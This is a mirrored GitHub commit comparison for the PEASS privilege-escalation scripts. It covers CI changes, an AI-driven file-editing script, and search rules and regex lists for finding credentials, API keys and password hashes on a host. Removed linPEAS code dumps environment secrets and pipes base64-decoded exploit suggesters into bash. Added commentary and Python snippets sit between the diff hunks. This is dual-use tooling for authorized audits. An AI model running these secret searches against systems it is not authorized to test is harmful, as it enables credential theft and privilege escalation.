mirror of
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
synced 2025-12-08 01:51:28 +00:00
Compare commits
75 Commits
Authors: carlospolop, aicoder
Commits: 78ad8346a3, a0f612b582, aa59afe289, 08144aaac3, 8f533247be, 660dc3dc60, 7b8b6670b8, 6f48de1573, 3cceae682d, 4a29293199, 6d2e33cd61, 8dd0350b5c, b4801ccc4d, 083ed6ae7d, ad2150ded5, 74377ec9e8, 917a3a0101, 099755dbcb, b9a44ffe66, cdd342fb26, 36523f520f, 7f4965c0b7, 898b29b0fa, e36d5a5736, 11cfe79ad0, a1552d61df, 71ec9c7d31, d4ff43b604, 56a193df60, f67bedda4f, f988d8b05f, 78c932f1af, 7e7738ab98, 68cd1c28df, 58719a6075, 2a4868c0eb, e4b9ae6479, 7b096cd930, a9ae25cdc3, e7617700b3, 96c821193e, 7bb66d2182, 711d9f1a95, a36c2c9107, 2963e47866, d20699ed51, df4f122a53, 7f8ea5fa44, 7e9c9b4e5b, fad2771dfb, 3e213bd8fd, 5356d3f2ec, 2ac2debc59, bb47a172b3, 69c3906ab7, 3bec4c4b52, 345bf63b40, 1e796b9876, 39d811c16f, a0175b0172, b0f4868feb, 4f295a138d, a1e06de8ca, 2775083680, 62e4b071cd, 4a0b8fb065, 4ba0f6b6c2, ff96d02125, 4f3a8265e0, 8912bd2b9c, 438e00527d, 144c0aef6f, c597da42f7, 613bf14049, 5b96594c3c
.github/ISSUE_TEMPLATE.md (vendored, 1 line changed)

@@ -1,4 +1,5 @@
If you are going to suggest something, please remove the following template.
If your issue is related to WinPEAS.ps1, please mention https://github.com/RandolphConley

#### Issue description

.github/workflows/CI-master_tests.yml (vendored, 28 lines changed)

@@ -1,9 +1,11 @@
name: CI-master_test

on:
  pull_request:
  push:
    branches:
      - master
    paths-ignore:
      - '.github/**'

  schedule:
    - cron: "5 4 * * SUN"
@@ -27,6 +29,10 @@ jobs:
        with:
          ref: ${{ github.head_ref }}

      - name: Download regexes
        run: |
          powershell.exe -ExecutionPolicy Bypass -File build_lists/download_regexes.ps1

      # Add MSBuild to the PATH: https://github.com/microsoft/setup-msbuild
      - name: Setup MSBuild.exe
        uses: microsoft/setup-msbuild@v1.0.2
@@ -43,9 +49,9 @@ jobs:
      - name: run MSBuild
        run: msbuild $env:Solution_Path

      # Execute all unit tests in the solution
      - name: Execute unit tests
        run: dotnet test $env:Solution_Path
      # Execute all unit tests in the solution - It's broken :(
      #- name: Execute unit tests
      #  run: dotnet test $env:Solution_Path

      # Build & update all versions
      - name: Build all versions
@@ -134,6 +140,12 @@ jobs:
          name: winPEAS.bat
          path: winPEAS\winPEASbat\winPEAS.bat

      - name: Upload winpeas.ps1
        uses: actions/upload-artifact@v2
        with:
          name: winPEAS.ps1
          path: winPEAS\winPEASps1\winPEAS.ps1

      # Git add
      #- name: Create local changes
      #  run: |
@@ -408,6 +420,10 @@ jobs:
        id: date
        run: echo "::set-output name=date::$(date +'%Y%m%d')"

      - name: Generate random
        id: random_n
        run: echo "::set-output name=some_rand::$(openssl rand -hex 4)"

      # Create the release
      - name: Create Release
        id: create_release
@@ -415,8 +431,8 @@ jobs:
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        with:
          tag_name: ${{steps.date.outputs.date}}
          release_name: Release ${{ github.ref }}2 ${{steps.date.outputs.date}}
          tag_name: ${{steps.date.outputs.date}}-${{steps.random_n.outputs.some_rand}}
          release_name: Release ${{ github.ref }} ${{steps.date.outputs.date}}-${{steps.random_n.outputs.some_rand}}
          draft: false
          prerelease: false

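The date plus `openssl rand -hex 4` pair exists so that two releases published on the same day still get distinct tags. A purely illustrative Python sketch producing the same YYYYMMDD-xxxxxxxx shape (not part of the workflow itself):

```python
import secrets
from datetime import datetime, timezone

# Same tag shape as the workflow builds from the date and random steps.
tag = f"{datetime.now(timezone.utc):%Y%m%d}-{secrets.token_hex(4)}"
print(tag)  # e.g. 20230704-1a2b3c4d
```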
.github/workflows/aicoder.yml (new file, vendored, 23 lines)

@@ -0,0 +1,23 @@
name: aicoder

on:
  workflow_dispatch:

jobs:
  Build_and_test_winpeas_master:
    runs-on: ubuntu-latest

    steps:
      # checkout
      - name: AICoder GH Action
        uses: AICoderHub/GH_Action@v0.11
        with:
          INPUT_MODE: 'file-optimizer'
          INPUT_PROMPT: ''
          INPUT_OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          INPUT_MODEL: 'gpt-4'
          TEMPLATE_FILES: ''
          ORIGIN_BRANCH: 'aicoder'
          TO_BRANCH: 'master'
          CHECK_PATH: './parsers/json2pdf.py'
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
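Because this workflow only has a workflow_dispatch trigger, it never runs on push; it has to be started from the Actions tab or through the GitHub API. A hedged Python sketch of that API call (the repository slug and branch are placeholders, and a token with workflow scope is assumed to be exported):

```python
import os
import requests

token = os.environ["GITHUB_TOKEN"]  # assumed: a PAT or Actions token with workflow scope
repo = "carlospolop/privilege-escalation-awesome-scripts-suite"  # placeholder slug
url = f"https://api.github.com/repos/{repo}/actions/workflows/aicoder.yml/dispatches"

resp = requests.post(
    url,
    headers={"Authorization": f"Bearer {token}", "Accept": "application/vnd.github+json"},
    json={"ref": "master"},  # branch the dispatched run should use
    timeout=10,
)
resp.raise_for_status()  # GitHub answers 204 No Content on success
```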
.gitignore (vendored, 2 lines changed)

@@ -28,3 +28,5 @@ sh2bin
sh2bin/*
.dccache
./*/.dccache
regexes.yaml
build_lists/regexes.yaml
AICoder.py (new file, 208 lines)

@@ -0,0 +1,208 @@
import argparse
import os
import sys
import string
import random
from typing import List
import openai
import json
import subprocess
import tiktoken
import requests
from github import Github

#########################
#### OPENAI FUNCTIONS ###
#########################

def reportTokens(prompt, model="gpt-4"):
    encoding = tiktoken.encoding_for_model(model)
    print("\033[37m" + str(len(encoding.encode(prompt))) + " tokens\033[0m" + " in prompt: " + "\033[92m" + prompt[:50] + "\033[0m" + ("..." if len(prompt) > 50 else ""))

def write_file(file_path: str, content: str):
    """Write content to a file creating the needed directories first"""
    os.makedirs(os.path.dirname(file_path), exist_ok=True)

    with open(file_path, "w") as file:
        file.write(content)

def delete_file(file_path: str):
    """Delete a file if it exists"""

    if os.path.isfile(file_path):
        os.remove(file_path)

openai_available_functions = {
    "write_file": write_file, "delete_file": delete_file
}

openai_functions = [
    {
        "name": "write_file",
        "description": "Write a file giving the path and the content",
        "parameters": {
            "type": "object",
            "properties": {
                "file_path": {
                    "type": "string",
                    "description": "Path to the file to write",
                },
                "content": {
                    "type": "string",
                    "description": "Content to write in the file",
                },
            },
            "required": ["file_path", "content"],
        },
    },
    {
        "name": "delete_file",
        "description": "Delete a file",
        "parameters": {
            "type": "object",
            "properties": {
                "file_path": {
                    "type": "string",
                    "description": "Path to the file to write",
                }
            },
            "required": ["file_path"],
        },
    }
]


#########################
#### GIT FUNCTIONS ######
#########################


def create_pull_request(branch_name, commit_message, github_token):
    github = Github(github_token)
    repo = github.get_repo(os.environ["GITHUB_REPOSITORY"])

    # Create a new branch
    base_branch = repo.get_branch(repo.default_branch)
    repo.create_git_ref(ref=f"refs/heads/{branch_name}", sha=base_branch.commit.sha)

    # Commit changes to the new branch
    subprocess.run(["git", "checkout", branch_name])
    subprocess.run(["git", "add", "."])
    subprocess.run(["git", "commit", "-m", commit_message])
    subprocess.run(["git", "push", "origin", branch_name])

    # Create a pull request
    pr = repo.create_pull(
        title=commit_message,
        body="Generated by OpenAI Github Action",
        head=branch_name,
        base=repo.default_branch
    )

    return pr.html_url


#########################
#### FILE PROCESSING ####
#########################


def process_file(prompt: str, api_key: str, file_path: str, model: str="gpt-4") -> str:
    with open(file_path, "r") as file:
        file_content = file.read()

    messages = [
        {"role": "system", "content": f"You are a developer and your goal is to generate code. The user will ask you to improve and modify some code. Your response must be a valid JSON with the path of each file to write as keys and the content of the files as values. Several files can be written at the same time."},
        {"role": "user", "content": prompt},
        {"role": "user", "content": f"This is the code from the file '{file_path}':\n\n{file_content}"}
    ]
    openai.api_key = api_key

    reportTokens(f"This is the code from the file '{file_path}':\n\n{file_content}")

    response = openai.ChatCompletion.create(
        model=model,
        messages=messages,
        temperature=0
    )
    response_message = response["choices"][0]["message"]

    # Step 2: check if GPT wanted to call a function
    if response_message.get("function_call"):

        function_name = response_message["function_call"]["name"]
        fuction_to_call = openai_available_functions[function_name]
        function_args = json.loads(response_message["function_call"]["arguments"])
        fuction_to_call(**function_args)


def process_folder(prompt: str, api_key: str, folder_path: str, model: str="gpt-4") -> List[str]:
    responses = []
    for root, _, files in os.walk(folder_path):
        for file in files:
            file_path = os.path.join(root, file)
            response = process_file(prompt, api_key, file_path, model)
            responses.append(response)


#########################
#### MAIN FUNCTION ######
#########################


def get_random_string(length):
    # With combination of lower and upper case
    letters = string.ascii_letters
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str

def main(prompt: str, api_key: str, file_path: str, github_token: str, model: str="gpt-4"):
    if os.path.isfile(file_path):
        process_file(prompt, api_key, file_path, model)
    elif os.path.isdir(file_path):
        process_folder(prompt, api_key, file_path, model)
    else:
        print("Error: Invalid file path.")
        sys.exit(1)

    try:
        create_pull_request(get_random_string(5), f"Modified {file_path}", github_token)
    except Exception as e:
        print(f"Error: Failed to create pull request. {e}")
        sys.exit(1)

if __name__ == "__main__":
    # Setup the argument parser
    parser = argparse.ArgumentParser()

    # Add arguments for prompt, api_key, file_path and github_token
    parser.add_argument('--prompt', default=None, type=str, help='Input prompt')
    parser.add_argument('--api-key', default=None, type=str, help='Input API key')
    parser.add_argument('--path', default=None, type=str, help='Input file/folder path')
    parser.add_argument('--github-token', default=None, type=str, help='Github token')
    parser.add_argument('--model', default="gpt-4", type=str, help='Model to use')

    # Parse the arguments
    args = parser.parse_args()
    prompt = os.environ.get("INPUT_PROMPT", args.prompt)
    api_key = os.environ.get("INPUT_API_KEY", args.api_key)
    file_path = os.environ.get("INPUT_FILE_PATH", args.path)
    github_token = os.environ.get("GITHUB_TOKEN", args.github_token)
    model = os.environ.get("INPUT_MODEL", args.model)

    if not prompt or not api_key or not file_path:
        print("Error: Missing required inputs.")
        sys.exit(1)

    #if not github_token:
    #    print("Error: Missing github token.")
    #    sys.exit(1)

    if os.path.exists(prompt):
        with open(prompt, "r") as file:
            prompt = file.read()

    if prompt.startswith("http"):
        prompt = requests.get(prompt).text

    main(prompt, api_key, file_path, github_token, model)
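For reference, the script is also runnable outside the Action. A hedged local invocation (the prompt, key and target path are placeholders; the flags match the argparse definitions above):

```python
import subprocess
import sys

# Hypothetical local run of AICoder.py; values are placeholders, not real credentials.
subprocess.run(
    [sys.executable, "AICoder.py",
     "--prompt", "Refactor this parser and keep its CLI unchanged",
     "--api-key", "sk-...",            # placeholder OpenAI key
     "--path", "parsers/json2pdf.py",  # same file the workflow points CHECK_PATH at
     "--model", "gpt-4"],
    check=True,
)
```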
@@ -30,7 +30,7 @@ Do you want to have **access the latest version of Hacktricks and PEASS**, obtai

**LinPEAS, WinPEAS and MacPEAS** aren’t enough for you? Welcome [**The PEASS Family**](https://opensea.io/collection/the-peass-family/), a limited collection of [**exclusive NFTs**](https://opensea.io/collection/the-peass-family/) of our favourite PEASS in disguise, designed by my team. Go **get your favourite and make it yours!** And if you are a **PEASS & Hacktricks enthusiast**, you can get your hands now on **our [custom swag](https://peass.creator-spring.com/) and show how much you like our projects!**

You can also, join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts, or follow me on Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).
You can also, join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts, or follow me on Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).

## Let's improve PEASS together

build_lists/download_regexes.ps1 (new file, 5 lines)

@@ -0,0 +1,5 @@
$scriptDir = Split-Path -Parent $MyInvocation.MyCommand.Path
$filePath = Join-Path $scriptDir "regexes.yaml"
$url = "https://raw.githubusercontent.com/JaimePolop/RExpository/main/regex.yaml"

Invoke-WebRequest $url -OutFile $filePath

build_lists/download_regexes.py (new executable file, 24 lines)

@@ -0,0 +1,24 @@
#!/usr/bin/env python3

import os
import requests
from pathlib import Path


def download_regexes():
    print("[+] Downloading regexes...")
    url = "https://raw.githubusercontent.com/JaimePolop/RExpository/main/regex.yaml"
    response = requests.get(url)
    if response.status_code == 200:
        # Save the content of the response to a file
        script_folder = Path(os.path.dirname(os.path.abspath(__file__)))
        target_file = script_folder / 'regexes.yaml'

        with open(target_file, "w") as file:
            file.write(response.text)
        print(f"Downloaded and saved in '{target_file}' successfully!")
    else:
        print("Error: Unable to download the regexes file.")
        exit(1)

download_regexes()
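A small follow-up check can confirm the downloaded file is usable before a build consumes it: parse the YAML and compile every pattern. This sketch assumes the file keeps the regular_expresions layout shown in the YAML below and that PyYAML is installed.

```python
import re
import yaml

with open("regexes.yaml") as fh:
    data = yaml.safe_load(fh)

for section in data.get("regular_expresions", []):  # key name as used by the builder
    for entry in section.get("regexes", []):
        try:
            re.compile(entry["regex"])
        except re.error as exc:
            print(f"[!] {section['name']} / {entry['name']}: {exc}")
```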
@@ -1,204 +1,2 @@
|
||||
paths:
|
||||
- $HOMESEARCH
|
||||
- /etc
|
||||
- /opt
|
||||
- /tmp
|
||||
- /private
|
||||
- /Applications
|
||||
- /var/www
|
||||
- /var/log
|
||||
- /private/var/log
|
||||
- /usr/local/www/
|
||||
- $backup_folders_row
|
||||
|
||||
|
||||
regular_expresions:
|
||||
# Hashes passwords
|
||||
- name: Hashed Passwords
|
||||
regexes:
|
||||
- name: Apr1 MD5
|
||||
regex: '\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
|
||||
|
||||
- name: Apache SHA
|
||||
regex: '\{SHA\}[0-9a-zA-Z/_=]{10,}'
|
||||
|
||||
- name: Blowfish
|
||||
regex: '\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*'
|
||||
|
||||
- name: Drupal
|
||||
regex: '\$S\$[a-zA-Z0-9_/\.]{52}'
|
||||
|
||||
- name: Joomlavbulletin
|
||||
regex: '[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}'
|
||||
|
||||
- name: Linux MD5
|
||||
regex: '\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
|
||||
|
||||
- name: phpbb3
|
||||
regex: '\$H\$[a-zA-Z0-9_/\.]{31}'
|
||||
|
||||
- name: sha512crypt
|
||||
regex: '\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}'
|
||||
|
||||
- name: Wordpress
|
||||
regex: '\$P\$[a-zA-Z0-9_/\.]{31}'
|
||||
|
||||
|
||||
# Raw Hashes
|
||||
- name: Raw Hashes
|
||||
regexes:
|
||||
#- name: md5 #Too many false positives
|
||||
# regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)'
|
||||
|
||||
#- name: sha1 #Too many false positives
|
||||
# regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)'
|
||||
|
||||
#- name: sha256 #Too many false positives
|
||||
# regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)'
|
||||
|
||||
- name: sha512
|
||||
regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)'
|
||||
|
||||
# APIs
|
||||
# https://github.com/l4yton/RegHex/blob/master/README.md
|
||||
- name: APIs
|
||||
regexes:
|
||||
#- name: Artifactory API Token # False +
|
||||
# regex: 'AKC[a-zA-Z0-9]{10,}' # False +
|
||||
|
||||
#- name: Artifactory Password
|
||||
# regex: 'AP[\dABCDEF][a-zA-Z0-9]{8,}'
|
||||
|
||||
#- name: Authorization Basic # Too many false positives
|
||||
# regex: 'basic [a-zA-Z0-9_:\.=\-]+'
|
||||
|
||||
#- name: Authorization Bearer # Too many false positives
|
||||
# regex: 'bearer [a-zA-Z0-9_\.=\-]+'
|
||||
|
||||
- name: AWS Client ID
|
||||
regex: '(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'
|
||||
extra_grep: '-Ev ":#|:<\!\-\-"'
|
||||
|
||||
- name: AWS MWS Key
|
||||
regex: 'amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
|
||||
|
||||
- name: AWS Secret Key
|
||||
regex: aws(.{0,20})?['"][0-9a-zA-Z\/+]{40}['"]
|
||||
|
||||
#- name: Base32 #Too many false positives
|
||||
# regex: '(?:[A-Z2-7]{8})*(?:[A-Z2-7]{2}={6}|[A-Z2-7]{4}={4}|[A-Z2-7]{5}={3}|[A-Z2-7]{7}=)?'
|
||||
|
||||
#- name: Base64 #Too many false positives
|
||||
# regex: '(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[a-zA-Z0-9+/]+={0,2}'
|
||||
|
||||
- name: Basic Auth Credentials
|
||||
regex: '://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+'
|
||||
|
||||
- name: Cloudinary Basic Auth
|
||||
regex: 'cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+'
|
||||
|
||||
- name: Facebook Access Token
|
||||
regex: 'EAACEdEose0cBA[0-9A-Za-z]+'
|
||||
|
||||
- name: Facebook Client ID
|
||||
regex: ([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['"][0-9]{13,17}
|
||||
|
||||
- name: Facebook Oauth
|
||||
regex: >
|
||||
[fF][aA][cC][eE][bB][oO][oO][kK].*['|"][0-9a-f]{32}['|"]
|
||||
|
||||
- name: Facebook Secret Key
|
||||
regex: >
|
||||
([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['"][0-9a-f]{32}
|
||||
|
||||
- name: Github
|
||||
regex: >
|
||||
github(.{0,20})?['"][0-9a-zA-Z]{35,40}
|
||||
|
||||
- name: Google API Key
|
||||
regex: 'AIza[0-9A-Za-z_\-]{35}'
|
||||
|
||||
- name: Google Cloud Platform API Key
|
||||
regex: >
|
||||
(google|gcp|youtube|drive|yt)(.{0,20})?['"][AIza[0-9a-z_\-]{35}]['"]
|
||||
|
||||
- name: Google Drive Oauth
|
||||
regex: '[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com'
|
||||
|
||||
- name: Google Oauth Access Token
|
||||
regex: 'ya29\.[0-9A-Za-z_\-]+'
|
||||
|
||||
- name: Heroku API Key
|
||||
regex: '[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'
|
||||
|
||||
- name: LinkedIn Client ID
|
||||
regex: >
|
||||
linkedin(.{0,20})?['"][0-9a-z]{12}['"]
|
||||
|
||||
- name: LinkedIn Secret Key
|
||||
regex: >
|
||||
linkedin(.{0,20})?['"][0-9a-z]{16}['"]
|
||||
|
||||
- name: Mailchamp API Key
|
||||
regex: '[0-9a-f]{32}-us[0-9]{1,2}'
|
||||
|
||||
- name: Mailgun API Key
|
||||
regex: 'key-[0-9a-zA-Z]{32}'
|
||||
|
||||
- name: Picatic API Key
|
||||
regex: 'sk_live_[0-9a-z]{32}'
|
||||
|
||||
- name: Slack Token
|
||||
regex: 'xox[baprs]-([0-9a-zA-Z]{10,48})?'
|
||||
|
||||
#- name: Slack Webhook #Not interesting
|
||||
# regex: 'https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}'
|
||||
|
||||
- name: Stripe API Key
|
||||
regex: 'k_live_[0-9a-zA-Z]{24}'
|
||||
|
||||
- name: Square Access Token
|
||||
regex: 'sqOatp-[0-9A-Za-z_\-]{22}'
|
||||
|
||||
- name: Square Oauth Secret
|
||||
regex: 'sq0csp-[ 0-9A-Za-z_\-]{43}'
|
||||
|
||||
- name: Twilio API Key
|
||||
regex: 'SK[0-9a-fA-F]{32}'
|
||||
|
||||
- name: Twitter Client ID
|
||||
regex: >
|
||||
[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['"][0-9a-z]{18,25}
|
||||
|
||||
- name: Twitter Oauth
|
||||
regex: >
|
||||
[tT][wW][iI][tT][tT][eE][rR].{0,30}['"\\s][0-9a-zA-Z]{35,44}['"\\s]
|
||||
|
||||
- name: Twitter Secret Key
|
||||
regex: >
|
||||
[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['"][0-9a-z]{35,44}
|
||||
|
||||
#- name: Vault Token #False +
|
||||
# regex: '[sb]\.[a-zA-Z0-9]{24}'
|
||||
|
||||
|
||||
# Misc
|
||||
- name: Misc
|
||||
regexes:
|
||||
- name: Basic Auth
|
||||
regex: '//(.+):(.+)@'
|
||||
|
||||
- name: Passwords1
|
||||
regex: (pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)
|
||||
|
||||
#- name: Passwords2
|
||||
# regex: 'passwd|creden|pwd'
|
||||
|
||||
- name: Usernames
|
||||
regex: 'username.*[=:].+'
|
||||
|
||||
#- name: IPs
|
||||
# regex: '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
|
||||
|
||||
#- name: Emails # Too many false positives
|
||||
# regex: '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}'
|
||||
This is a placeholder.
|
||||
To fill this yaml execute one of the scripts download_regexes.py or download_regexes.ps1
|
||||
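Entries like the AWS Client ID pattern above are plain extended regexes, so they can be exercised directly. A quick hedged Python check of that single pattern against an arbitrary text file (the regex is copied from the list above; the file path is a placeholder):

```python
import re

AWS_CLIENT_ID = r"(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"

with open("/tmp/sample.env", errors="ignore") as fh:  # placeholder target file
    for n, line in enumerate(fh, 1):
        if re.search(AWS_CLIENT_ID, line):
            print(f"line {n}: possible AWS client ID: {line.strip()}")
```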
@@ -1141,6 +1141,15 @@ search:
        - name: "authorized_keys"
          value:
            good_regex: 'from=[\w\._\-]+'
            bad_regex: "command=.*"
            type: f
            search_in:
              - common

        - name: "*.pub"
          value:
            bad_regex: "command=.*"
            only_bad_lines: True
            type: f
            search_in:
              - common
@@ -1376,6 +1385,12 @@ search:
            search_in:
              - common

        - name: "ErrorRecords" # Azure logs can contain credentials
          value:
            type: d
            search_in:
              - common

        - name: "TokenCache.dat"
          value:
            bad_regex: ".*"
@@ -1691,6 +1706,43 @@ search:
            type: f
            search_in:
              - common
  - name: SIP
    value:
      config:
        auto_check: True

      files:
        - name: "sip.conf"
          value:
            bad_regex: "secret.*|allowguest.*=.*true"
            remove_empty_lines: True
            type: f
            search_in:
              - common

        - name: "amportal.conf"
          value:
            bad_regex: ".*PASS.*=.*"
            remove_empty_lines: True
            type: f
            search_in:
              - common

        - name: "FreePBX.conf"
          value:
            bad_regex: ".*AMPDB.*=.*"
            only_bad_lines: True
            type: f
            search_in:
              - common

        - name: "Elastix.conf"
          value:
            bad_regex: ".*pwd.*=.*"
            remove_empty_lines: True
            type: f
            search_in:
              - common

  - name: GMV Auth
    value:
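The bad_regex / good_regex / only_bad_lines fields drive how the builder greps each discovered file. A rough Python sketch of that matching logic (the field semantics are inferred from the names above, not taken from the builder source):

```python
import re

# Hypothetical search entry, mirroring the YAML fields above.
entry = {"bad_regex": "command=.*", "good_regex": r"from=[\w\._\-]+", "only_bad_lines": True}

def classify_lines(path, entry):
    bad = re.compile(entry["bad_regex"]) if entry.get("bad_regex") else None
    good = re.compile(entry["good_regex"]) if entry.get("good_regex") else None
    with open(path, errors="ignore") as fh:
        for line in fh:
            is_bad = bool(bad and bad.search(line))
            is_good = bool(good and good.search(line))
            if entry.get("only_bad_lines") and not is_bad:
                continue  # report only lines that hit the "bad" pattern
            yield line.rstrip(), is_bad, is_good

# Example: flag risky options in an authorized_keys file.
# for line, bad, good in classify_lines("/root/.ssh/authorized_keys", entry): print(bad, good, line)
```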
linPEAS/builder/linpeas_base.sh (new file, 4622 lines)
File diff suppressed because one or more lines are too long
@@ -37,6 +37,7 @@ search_for_regex(){
    timeout 120 find /tmp /srv /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
  fi
  wait
  printf "\033[2K\r"
}

@@ -99,145 +99,3 @@ if [ "$(command -v smbutil)" ] || [ "$DEBUG" ]; then
|
||||
warn_exec smbutil statshares -a
|
||||
echo ""
|
||||
fi
|
||||
|
||||
#-- SY) Environment vars
|
||||
print_2title "Environment"
|
||||
print_info "Any private information inside environment variables?"
|
||||
(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_KUBERNETES" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set"
|
||||
echo ""
|
||||
|
||||
#-- SY) Dmesg
|
||||
if [ "$(command -v dmesg 2>/dev/null)" ] || [ "$DEBUG" ]; then
|
||||
print_2title "Searching Signature verification failed in dmesg"
|
||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed"
|
||||
(dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg"
|
||||
echo ""
|
||||
fi
|
||||
|
||||
#-- SY) Kernel extensions
|
||||
if [ "$MACPEAS" ]; then
|
||||
print_2title "Kernel Extensions not belonging to apple"
|
||||
kextstat 2>/dev/null | grep -Ev " com.apple."
|
||||
|
||||
print_2title "Unsigned Kernel Extensions"
|
||||
macosNotSigned /Library/Extensions
|
||||
macosNotSigned /System/Library/Extensions
|
||||
fi
|
||||
|
||||
if [ "$(command -v bash 2>/dev/null)" ]; then
|
||||
print_2title "Executing Linux Exploit Suggester"
|
||||
print_info "https://github.com/mzet-/linux-exploit-suggester"
|
||||
les_b64="peass{LES}"
|
||||
echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,\[CVE-[0-9]+-[0-9]+\].*,${SED_RED},g"
|
||||
echo ""
|
||||
fi
|
||||
|
||||
if [ "$(command -v perl 2>/dev/null)" ]; then
|
||||
print_2title "Executing Linux Exploit Suggester 2"
|
||||
print_info "https://github.com/jondonas/linux-exploit-suggester-2"
|
||||
les2_b64="peass{LES2}"
|
||||
echo $les2_b64 | base64 -d | perl 2>/dev/null | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
|
||||
echo ""
|
||||
fi
|
||||
|
||||
if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null)" ]; then
|
||||
print_2title "Brew Doctor Suggestions"
|
||||
brew doctor
|
||||
echo ""
|
||||
fi
|
||||
|
||||
|
||||
|
||||
#-- SY) AppArmor
|
||||
print_2title "Protections"
|
||||
print_list "AppArmor enabled? .............. "$NC
|
||||
if [ "$(command -v aa-status 2>/dev/null)" ]; then
|
||||
aa-status 2>&1 | sed "s,disabled,${SED_RED},"
|
||||
elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then
|
||||
apparmor_status 2>&1 | sed "s,disabled,${SED_RED},"
|
||||
elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then
|
||||
ls -d /etc/apparmor*
|
||||
else
|
||||
echo_not_found "AppArmor"
|
||||
fi
|
||||
|
||||
#-- SY) LinuxONE
|
||||
print_list "is linuxONE? ................... "$NC
|
||||
( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x")
|
||||
|
||||
#-- SY) grsecurity
|
||||
print_list "grsecurity present? ............ "$NC
|
||||
( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
|
||||
|
||||
#-- SY) PaX
|
||||
print_list "PaX bins present? .............. "$NC
|
||||
